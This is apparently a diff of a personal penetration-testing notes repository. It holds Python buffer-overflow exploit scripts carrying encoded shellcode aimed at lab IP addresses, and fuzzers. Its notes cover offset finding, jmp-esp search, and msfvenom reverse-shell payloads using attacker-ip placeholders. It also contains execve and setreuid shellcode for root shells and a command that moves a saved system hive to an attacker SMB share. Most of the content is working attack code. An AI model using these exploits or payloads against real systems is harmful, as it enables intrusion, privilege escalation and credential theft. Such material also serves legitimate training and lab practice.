move system.bak \\<attacker-IP>\share\system.bak
|
||||||
|
```
|
||||||
|
* Disconnect
|
||||||
|
```sh
|
||||||
|
net use \\<attacker-IP>\share /del
|
||||||
|
```
|
||||||
|
|
||||||
|
## Workarounds
|
||||||
|
|
||||||
|
* System Error 1312. User credentials need a domain
|
||||||
|
```sh
|
||||||
|
/USER:domain\user
|
||||||
|
```
|
|
@ -0,0 +1,8 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
listRem = "\\x0a".split("\\x")
|
||||||
|
for x in range(1, 256):
|
||||||
|
if "{:02x}".format(x) not in listRem:
|
||||||
|
print("\\x" + "{:02x}".format(x), end='')
|
||||||
|
print()
|
|
@ -0,0 +1,65 @@
|
||||||
|
import sys
|
||||||
|
import socket
|
||||||
|
|
||||||
|
badchars = bytearray()
|
||||||
|
listRem = [0x00]
|
||||||
|
for x in range(1, 256):
|
||||||
|
if x not in listRem:
|
||||||
|
badchars.append(x)
|
||||||
|
|
||||||
|
buf = b""
|
||||||
|
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
|
||||||
|
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
|
||||||
|
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
|
||||||
|
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
|
||||||
|
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
|
||||||
|
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
|
||||||
|
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
|
||||||
|
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
|
||||||
|
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
|
||||||
|
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
|
||||||
|
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
|
||||||
|
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
|
||||||
|
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
|
||||||
|
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
|
||||||
|
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
|
||||||
|
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
|
||||||
|
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
|
||||||
|
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
|
||||||
|
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
|
||||||
|
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
|
||||||
|
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
|
||||||
|
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
|
||||||
|
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
|
||||||
|
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
|
||||||
|
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
|
||||||
|
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
|
||||||
|
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
|
||||||
|
|
||||||
|
|
||||||
|
ip = "10.10.143.77"
|
||||||
|
port = 9999
|
||||||
|
|
||||||
|
|
||||||
|
offset = 2012
|
||||||
|
overflow = b"A" * offset
|
||||||
|
retn = b"\xdf\x14\x50\x62" #"BBBB"
|
||||||
|
padding = b"\x90" * 16
|
||||||
|
payload = buf
|
||||||
|
postfix = b""
|
||||||
|
|
||||||
|
|
||||||
|
buffer = overflow + retn + padding + payload + postfix
|
||||||
|
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
s.connect((ip, port))
|
||||||
|
s.recv(2000)
|
||||||
|
s.send(b"pwnbot")
|
||||||
|
s.recv(2000)
|
||||||
|
print("Sending evil buffer...")
|
||||||
|
s.send(buffer)
|
||||||
|
print("Done!")
|
||||||
|
s.close()
|
||||||
|
except socket.error:
|
||||||
|
print("Could not connect: "+socket.error)
|
|
@ -0,0 +1,54 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
|
||||||
|
ip = "10.10.122.155"
|
||||||
|
port = 31337
|
||||||
|
|
||||||
|
prefix = ""
|
||||||
|
offset = 146
|
||||||
|
overflow = "A" * offset
|
||||||
|
# EIP return
|
||||||
|
#retn = "BBBB"
|
||||||
|
retn = "\xc3\x14\x04\x08"
|
||||||
|
padding = "\x90" * 16
|
||||||
|
#padding = ""
|
||||||
|
#payload = ""
|
||||||
|
payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
|
||||||
|
payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
|
||||||
|
payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
|
||||||
|
payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
|
||||||
|
payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
|
||||||
|
payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
|
||||||
|
payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
|
||||||
|
payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
|
||||||
|
payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
|
||||||
|
payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
|
||||||
|
payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
|
||||||
|
payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
|
||||||
|
payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
|
||||||
|
payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
|
||||||
|
payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
|
||||||
|
payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
|
||||||
|
payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
|
||||||
|
payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
|
||||||
|
payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
|
||||||
|
payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
|
||||||
|
payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
|
||||||
|
payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
|
||||||
|
payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
|
||||||
|
payload += "\xef\xd9\x08\x3d\x0f\xc8";
|
||||||
|
|
||||||
|
#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
|
||||||
|
postfix = ""
|
||||||
|
buffer = prefix + overflow + retn + padding + payload + postfix
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
try:
|
||||||
|
s.connect((ip, port))
|
||||||
|
print("[*] Sending buffer...")
|
||||||
|
s.send(bytes(buffer + "\r\n", "latin-1"))
|
||||||
|
print("Done!")
|
||||||
|
except:
|
||||||
|
print("Could not connect")
|
|
@ -0,0 +1,52 @@
|
||||||
|
# amd64
|
||||||
|
|
||||||
|
* `rax` return value, caller saved.
|
||||||
|
* `r10`, `r11` are caller saved.
|
||||||
|
* `rbx`, `r12`, `r13`, `r14` are callee saved
|
||||||
|
* `rbp` is also callee saved(and can be optionally used as a frame pointer)
|
||||||
|
* `rsp` is callee saved
|
||||||
|
|
||||||
|
## Function argument registers
|
||||||
|
* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
|
||||||
|
* Further function args are stored inside its stack frame.
|
||||||
|
|
||||||
|
|
||||||
|
## Overwriting Variables and Padding
|
||||||
|
* Overwrite an atomic variable behind a buffer
|
||||||
|
```C
|
||||||
|
int main ( int argc, char ** argv ) {
|
||||||
|
int var = 0
|
||||||
|
char buffer[12];
|
||||||
|
|
||||||
|
gets(buffer);
|
||||||
|
[...]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
* Stack layout
|
||||||
|
```
|
||||||
|
Bottom
|
||||||
|
+------------------+
|
||||||
|
| Saved regsisters |
|
||||||
|
+------------------+
|
||||||
|
| int var |
|
||||||
|
+------------------+
|
||||||
|
| char buffer [11] |
|
||||||
|
| ... |
|
||||||
|
| ... |
|
||||||
|
| ... |
|
||||||
|
| char buffer [0] |
|
||||||
|
+------------------+
|
||||||
|
| char ** argv |
|
||||||
|
+------------------+
|
||||||
|
| char argc |
|
||||||
|
+------------------+
|
||||||
|
Top
|
||||||
|
```
|
||||||
|
|
||||||
|
* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
|
||||||
|
```
|
||||||
|
+-------------+----+
|
||||||
|
|12 byte array| 4b |
|
||||||
|
+-------------+----+
|
||||||
|
0 12 16 byte
|
||||||
|
```
|
|
@ -0,0 +1,66 @@
|
||||||
|
# Buffer Overflow
|
||||||
|
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
* Fuzz & crash the binary pretty roughly via payload
|
||||||
|
```sh
|
||||||
|
python -c "print('A' * 3000)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Fuzzing
|
||||||
|
* python 3
|
||||||
|
../fuzzer.py
|
||||||
|
|
||||||
|
* python 2
|
||||||
|
../fuzzer2.py
|
||||||
|
|
||||||
|
## Measure Offset
|
||||||
|
* Use as payload
|
||||||
|
```sh
|
||||||
|
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
|
||||||
|
```
|
||||||
|
* Find content of the payload at EIP and identify exact bufferlength
|
||||||
|
```sh
|
||||||
|
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
|
||||||
|
```
|
||||||
|
```
|
||||||
|
msf-pattern_offset -l <bufferlength> -q <EIP>
|
||||||
|
```
|
||||||
|
```
|
||||||
|
mona msfpattern -l <bufferlength>
|
||||||
|
```
|
||||||
|
* Fill offset variable in exploit `buffer_overflow.py`
|
||||||
|
../buffer_overflow.py
|
||||||
|
|
||||||
|
* Execute buffer_overflow.py, EIP should contain `BBBB`
|
||||||
|
|
||||||
|
## Find bad characters to input in the buffer
|
||||||
|
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
|
||||||
|
../bad_chars.py
|
||||||
|
|
||||||
|
* Compare stack if any bad chars block exectuion of the payload following in the next steps.
|
||||||
|
```sh
|
||||||
|
!mona bytearray -b "\x00"
|
||||||
|
!mona compare -f <path_to_bytearray.bin> -a <ESP>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Find Jump Point / RoP
|
||||||
|
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
|
||||||
|
|
||||||
|
### Example: Immunity Debugger using mona on windows machine
|
||||||
|
```sh
|
||||||
|
!mona modules
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
!mona jmp -r esp -m <exploitable_bin_from_modules>
|
||||||
|
```
|
||||||
|
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
|
||||||
|
|
||||||
|
## Shellcode as Payload
|
||||||
|
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
|
||||||
|
```sh
|
||||||
|
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
|
||||||
|
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
|
||||||
|
```
|
||||||
|
* Prepend NOPs as padding before shellcode
|
||||||
|
|
|
@ -0,0 +1,121 @@
|
||||||
|
# Return Address reuse
|
||||||
|
|
||||||
|
## via Shellcode, an examples
|
||||||
|
* Find out the address of the start of the buffer and the start address of the return address
|
||||||
|
* Calculate the difference between these addresses so you know how much data to enter to overflow
|
||||||
|
* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
|
||||||
|
|
||||||
|
* Plus NOPsled (sometimes xargs is needed in front of the app call)
|
||||||
|
```python
|
||||||
|
python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding Offset
|
||||||
|
### via gdb segfault output
|
||||||
|
* 64 bit addresses use 6 out of 8 byte for addresses.
|
||||||
|
```sh
|
||||||
|
gdb ./application
|
||||||
|
run $(python -c "print('\x41' * 180)")
|
||||||
|
```
|
||||||
|
* Return address hit completely when 6 bytes are filled.
|
||||||
|
```sh
|
||||||
|
Program received signal SIGSEGV, Segmentation fault.
|
||||||
|
0x0000414141414141 in copy_arg ()
|
||||||
|
```
|
||||||
|
* Buffer = measured_length - (`$rbp` + 6 bytes return address)
|
||||||
|
|
||||||
|
### via metasploit
|
||||||
|
```sh
|
||||||
|
/opt/metasploit/tools/exploit/pattern_create.rb -l 180
|
||||||
|
```
|
||||||
|
* Looking for `rbp` Content in front of the return address to measure offset
|
||||||
|
```sh
|
||||||
|
(gdb) i r
|
||||||
|
[...]
|
||||||
|
rbp 0x<rbpAddress> 0x<rbpConent>
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
* Measure offset
|
||||||
|
```sh
|
||||||
|
pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Crafting Payload
|
||||||
|
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
|
||||||
|
* Inside gdb
|
||||||
|
```sh
|
||||||
|
run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
|
||||||
|
```
|
||||||
|
* Check actual stack
|
||||||
|
```sh
|
||||||
|
(gdb) x/100x $rsp-200
|
||||||
|
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
|
||||||
|
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
|
||||||
|
0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141
|
||||||
|
0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
|
||||||
|
0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141
|
||||||
|
0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141
|
||||||
|
0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141
|
||||||
|
0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141
|
||||||
|
0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a
|
||||||
|
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
|
||||||
|
## NopSled
|
||||||
|
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
|
||||||
|
```sh
|
||||||
|
(gdb) x/100x $rsp-200
|
||||||
|
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
|
||||||
|
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
|
||||||
|
0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090
|
||||||
|
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
|
||||||
|
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
|
||||||
|
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
|
||||||
|
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
|
||||||
|
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
|
||||||
|
0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a
|
||||||
|
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
|
||||||
|
```
|
||||||
|
* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
|
||||||
|
```sh
|
||||||
|
run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
|
||||||
|
```
|
||||||
|
|
||||||
|
## setuid() and setreuid()
|
||||||
|
* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
|
||||||
|
* `/bin/sh` checks real uid not effective uid
|
||||||
|
* ./shellcodes/setuid_shell.as
|
||||||
|
|
||||||
|
### setreuid() in assembler
|
||||||
|
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
|
||||||
|
* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
|
||||||
|
* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
|
||||||
|
* ./shellcode/setreuid_shell.as
|
||||||
|
```sh
|
||||||
|
"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
|
||||||
|
```
|
||||||
|
* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
|
||||||
|
|
||||||
|
### setreuid() in shellcode using pwntools
|
||||||
|
* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
|
||||||
|
```sh
|
||||||
|
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
|
||||||
|
shellcraft -f d amd64.linux.setreuid
|
||||||
|
```
|
||||||
|
* The uid can be set as an argument
|
||||||
|
```sh
|
||||||
|
shellcraft -f d amd64.linux.setreuid <uid>
|
||||||
|
```
|
||||||
|
* Prepend this in front of the existing shellcode like this
|
||||||
|
```sh
|
||||||
|
run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
|
||||||
|
```
|
||||||
|
* Where the existing shellcode is the following
|
||||||
|
```sh
|
||||||
|
\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
|
||||||
|
```
|
||||||
|
* Setreuid part is the following
|
||||||
|
```sh
|
||||||
|
\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
|
||||||
|
```
|
|
@ -0,0 +1,23 @@
|
||||||
|
xor rdi,rdi <------ set the rdi to 0
|
||||||
|
xor rax,rax
|
||||||
|
xor rsi, rsi <------ set the rsi to 0
|
||||||
|
mov si, 1002 <------ put the value 1002 in the lower bits of the rsi
|
||||||
|
mov di, 1002 <------ put the value 1002 in the lower bits of the rdi
|
||||||
|
mov al,0x71 <------ put the setruid function in the al register
|
||||||
|
syscall <------ call the function.
|
||||||
|
xor rdx,rdx
|
||||||
|
movabs rbx,0x68732f6e69622fff
|
||||||
|
shr rbx,0x8
|
||||||
|
push rbx
|
||||||
|
mov rdi,rsp
|
||||||
|
xor rax,rax
|
||||||
|
push rax
|
||||||
|
push rdi
|
||||||
|
mov rsi,rsp
|
||||||
|
mov al,0x3b
|
||||||
|
syscall
|
||||||
|
push 0x1
|
||||||
|
pop rdi
|
||||||
|
push 0x3c
|
||||||
|
pop rax
|
||||||
|
syscall
|
|
@ -0,0 +1,37 @@
|
||||||
|
etuid(0) + execve(/bin/sh) - just 4 fun.
|
||||||
|
xi4oyu [at] 80sec.com
|
||||||
|
|
||||||
|
main(){
|
||||||
|
__asm( "xorq %rdi,%rdi\n\t"
|
||||||
|
"mov $0x69,%al\n\t"
|
||||||
|
"syscall \n\t"
|
||||||
|
"xorq %rdx, %rdx \n\t"
|
||||||
|
"movq $0x68732f6e69622fff,%rbx; \n\t"
|
||||||
|
"shr $0x8, %rbx; \n\t"
|
||||||
|
"push %rbx; \n\t"
|
||||||
|
"movq %rsp,%rdi; \n\t"
|
||||||
|
"xorq %rax,%rax; \n\t"
|
||||||
|
"pushq %rax; \n\t"
|
||||||
|
"pushq %rdi; \n\t"
|
||||||
|
"movq %rsp,%rsi; \n\t"
|
||||||
|
"mov $0x3b,%al; \n\t"
|
||||||
|
"syscall ; \n\t"
|
||||||
|
"pushq $0x1 ; \n\t"
|
||||||
|
"pop %rdi ; \n\t"
|
||||||
|
"pushq $0x3c ; \n\t"
|
||||||
|
"pop %rax ; \n\t"
|
||||||
|
"syscall ; \n\t"
|
||||||
|
);
|
||||||
|
}
|
||||||
|
*/
|
||||||
|
main() {
|
||||||
|
char shellcode[] =
|
||||||
|
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
|
||||||
|
"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
|
||||||
|
"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
|
||||||
|
"\x58\x0f\x05";
|
||||||
|
(*(void (*)()) shellcode)();
|
||||||
|
}
|
||||||
|
|
||||||
|
2009-05-14
|
||||||
|
evil.xi4oyu
|
|
@ -0,0 +1,24 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
import sys, time, socket
|
||||||
|
|
||||||
|
ip = "192.168.56.102"
|
||||||
|
port = 31337
|
||||||
|
timeout = 5
|
||||||
|
prefix = ""
|
||||||
|
counter = 100
|
||||||
|
|
||||||
|
string = prefix + "A" * counter
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||||
|
s.connect((ip, port))
|
||||||
|
print ('[+] Sending buffer')
|
||||||
|
#s.recv(1024)
|
||||||
|
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
|
||||||
|
s.send(bytes(string + '\r\n', "latin1"))
|
||||||
|
s.recv(1024)
|
||||||
|
except:
|
||||||
|
print ("[!] The program can't be reached")
|
||||||
|
sys.exit(0)
|
||||||
|
string += counter * 'A'
|
||||||
|
time.sleep(1)
|
|
@ -0,0 +1,24 @@
|
||||||
|
#!/usr/bin/env python2
|
||||||
|
import sys,socket
|
||||||
|
import time
|
||||||
|
|
||||||
|
address = '192.168.56.102'
|
||||||
|
port = 9999
|
||||||
|
buffer = ['A']
|
||||||
|
counter = 100
|
||||||
|
while len(buffer) < 10:
|
||||||
|
buffer.append('A'*counter)
|
||||||
|
counter=counter+100
|
||||||
|
try:
|
||||||
|
for string in buffer:
|
||||||
|
print '[+] Sending %s bytes...' % len(string)
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
connect=s.connect((address,port))
|
||||||
|
s.send(string + '\r\n')
|
||||||
|
s.recv(1024)
|
||||||
|
print '[+] Done'
|
||||||
|
except:
|
||||||
|
print '[!] Unable to connect to the application. You may have crashed it.'
|
||||||
|
sys.exit(0)
|
||||||
|
finally:
|
||||||
|
s.close()
|
|
@ -0,0 +1,31 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
import socket, time, sys
|
||||||
|
|
||||||
|
ip = "10.10.161.147"
|
||||||
|
port = 9999
|
||||||
|
timeout = 5
|
||||||
|
prefix = ""
|
||||||
|
|
||||||
|
string = prefix + "A" * 100
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||||
|
s.settimeout(timeout)
|
||||||
|
s.connect((ip, port))
|
||||||
|
s.recv(1024)
|
||||||
|
s.recv(1024)
|
||||||
|
s.send("User" '\r\n')
|
||||||
|
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
|
||||||
|
s.send(bytes(string, "latin-1"))
|
||||||
|
s.recv(1024)
|
||||||
|
s.send(string + '\r\n')
|
||||||
|
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
|
||||||
|
print(f"fuzzing with {len(string)} bytes")
|
||||||
|
except:
|
||||||
|
#print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
|
||||||
|
sys.exit(0)
|
||||||
|
string += 100 * "A"
|
||||||
|
time.sleep(1)
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
